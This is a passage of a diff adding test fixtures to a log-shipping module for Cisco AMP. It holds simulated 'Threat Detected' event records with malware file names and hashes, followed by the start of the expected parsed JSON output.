Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542427","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":112000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542426","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":71000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542425","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":532000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667841684537367","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":454000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667841684537366","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":80000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667841684537365","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258118058508000,"timestamp":1610705633,"timestamp_nanoseconds":636000000,"date":"2021-01-15T10:13:53+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258118058508361","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667837389570000,"timestamp":1610705633,"timestamp_nanoseconds":689000000,"date":"2021-01-15T10:13:53+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667837389570068","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258066518901000,"timestamp":1610705621,"timestamp_nanoseconds":608000000,"date":"2021-01-15T10:13:41+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258066518900808","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258014979293000,"timestamp":1610705609,"timestamp_nanoseconds":581000000,"date":"2021-01-15T10:13:29+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258014979293255","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257963439686000,"timestamp":1610705597,"timestamp_nanoseconds":569000000,"date":"2021-01-15T10:13:17+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257963439685702","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":778000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667579691532307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":747000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667579691532306","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":371000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667579691532305","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667575396565000,"timestamp":1610705572,"timestamp_nanoseconds":971000000,"date":"2021-01-15T10:12:52+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667575396565008","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp3.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp3.ndjson.log-expected.json new file mode 100644 index 00000000000..1722799bd5e --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp3.ndjson.log-expected.json 
@@ -0,0 +1,2828 @@ +[ + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.DFC.MalParent", + "cisco.amp.detection_id": "6159251512150196256", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 381000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "input.type": "log", + "log.offset": 0, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + 
"ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196255", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 381000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 1317, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": 
"6159251512150196254", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 365000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 2642, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196253", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + 
"90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 350000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 3967, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196252", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 334000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + 
"event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 5292, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + 